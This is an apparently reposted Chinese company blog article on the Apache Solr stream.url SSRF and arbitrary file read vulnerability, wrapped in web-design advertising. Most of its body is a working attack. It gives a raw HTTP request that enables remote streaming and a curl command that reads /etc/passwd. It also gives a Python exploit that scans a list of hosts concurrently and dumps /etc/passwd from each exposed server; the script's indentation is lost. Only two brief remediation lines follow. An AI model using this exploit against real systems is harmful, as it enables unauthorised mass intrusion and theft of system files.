资讯

精准传达 • 有效沟通

从品牌网站建设到网络营销策划,从策略到执行的一站式服务

网站建设 >

查看其它板块

Apache-Solr任意文件读取漏洞怎么修复

这篇文章主要讲解了“Apache-Solr任意文件读取漏洞怎么修复”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“Apache-Solr任意文件读取漏洞怎么修复”吧!

创新互联专注于广汉企业网站建设,响应式网站建设,成都做商城网站。广汉网站建设公司,为广汉等地区提供建站服务。全流程定制设计,专业设计,全程项目跟踪,创新互联专业和态度为您提供的服务

漏洞描述

Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。

漏洞评级

Apache Solr stream.url SSRF与任意文件读取漏洞 中危

影响版本

Apache Solr 所有版本

安全版本

官方不予修复,暂无安全版本。

复现过程

环境搭建

docker search solr
docker pull solr
docker run -d -p 8983:8983 solr
docker  exec  -it  实例id  /bin/bash
cp -r server/solr/configsets/_default/conf /var/solr/data/test1

参考:http://www.bubuko.com/infodetail-3118740.html

漏洞复现

首先获取core

以my_core测试为例,

POST /solr/my_core/config HTTP/1.1
Host: x.x.x.x:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 84


{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

读取文件

curl "http://ip:8983/solr/my_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"

EXP:

#!/usr/bin/python
# coding: UTF-8
import argparse
import asyncio
import json
import pathlib
from typing import Tuple
from urllib.parse import urlparse

import httpx


class URLAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not urlparse(values):
raise ValueError("Not a valid url!")
setattr(namespace, self.dest, values)


class FILEAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not pathlib.Path(values).exists():
raise ValueError("File not exists!")
setattr(namespace, self.dest, values)


parser = argparse.ArgumentParser(description="Solr Poc")
parser.add_argument("--host", type=str, action=URLAction, help="target host uri")
parser.add_argument("--file", type=str, action=FILEAction, help="target host file")
parser.add_argument("--conn", type=int, default=10, help="asyncio max connetions")
args = parser.parse_args()


SEM = asyncio.Semaphore(args.conn)
RESULT = {}


async def check(host: str) -> Tuple[str, bool]:
status = False
async with SEM:
async with httpx.AsyncClient(base_url=host) as client:
try:
core_data = (
await client.get(
"/solr/admin/cores?indexInfo=false&wt=json", timeout=3
)
).json()
except httpx.ReadTimeout:
print(f"{host} TimeOut!")
status = "TimeOut"
else:
if (data_status := core_data["status"]) :
core =  list(data_status.keys())[0]
await client.post(
f"/solr/{core}/config",
json={
"set-property": {
"requestDispatcher.requestParsers.enableRemoteStreaming": "true"
}
},
)
result_data = (
await client.post(
url=f"/solr/{core}/debug/dump?param=ContentStreams",
data={"stream.url": "file:///etc/passwd"},
)
).json()
if (streams := result_data["streams"]) :
print(streams[0]["stream"])
status = True
finally:
RESULT[host] = status
return host, status


async def loop(urls):
await asyncio.gather(*list(map(check, urls)))


def main():
result_file = pathlib.Path("solr_main.json")
try:
urls = set()
if args.host:
urls.add(args.host)
if args.file:
with pathlib.Path(args.file).open("r") as file:
urls = urls.union(
{url for line in file if urlparse((url := line.strip()))}
)
print(f"tasks: {len(urls)}")
asyncio.run(loop(urls))
except KeyboardInterrupt:
pass
finally:
with result_file.open("w") as file:
file.write(json.dumps(RESULT, indent=4, ensure_ascii=True))

修复建议

1. 增加身份验证/授权

2. 禁止Solr API 以及管理 UI 直接对公网开放。设置防火墙,以便只允许受信任的计算机和人员访问。

感谢各位的阅读,以上就是“Apache-Solr任意文件读取漏洞怎么修复”的内容了,经过本文的学习后,相信大家对Apache-Solr任意文件读取漏洞怎么修复这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是创新互联,小编将为大家推送更多相关知识点的文章,欢迎关注!


分享文章:Apache-Solr任意文件读取漏洞怎么修复
当前URL:http://cdkjz.cn/article/jhoijg.html
返回首页 了解更多建站资讯

相关资讯

多年建站经验

多一份参考,总有益处

联系快上网,免费获得专属《策划方案》及报价

咨询相关问题或预约面谈,可以通过以下方式与我们联系

大客户专线   成都:13518219792   座机:028-86922220

在线咨询 提交需求
友情链接 交换友情链接
南宁旺客科技王君美油画成都西云机房网站制作价格温江电信机房解决方案泸县网站建设成都微信小程序开发微信小程序开发网站维护

成都网站建设公司地址:成都市青羊区太升南路288号锦天国际A座10层 建设咨询028-86922220

成都快上网科技有限公司-四川网站建设设计公司 | 蜀ICP备19037934号 Copyright 2020,ALL Rights Reserved cdkjz.cn | 成都网站建设 | © Copyright 2020版权所有.

专家团队为您提供成都网站建设,成都网站设计,成都品牌网站设计,成都营销型网站制作等服务,成都建网站就找快上网! | 成都网站建设哪家好? | 网站建设地图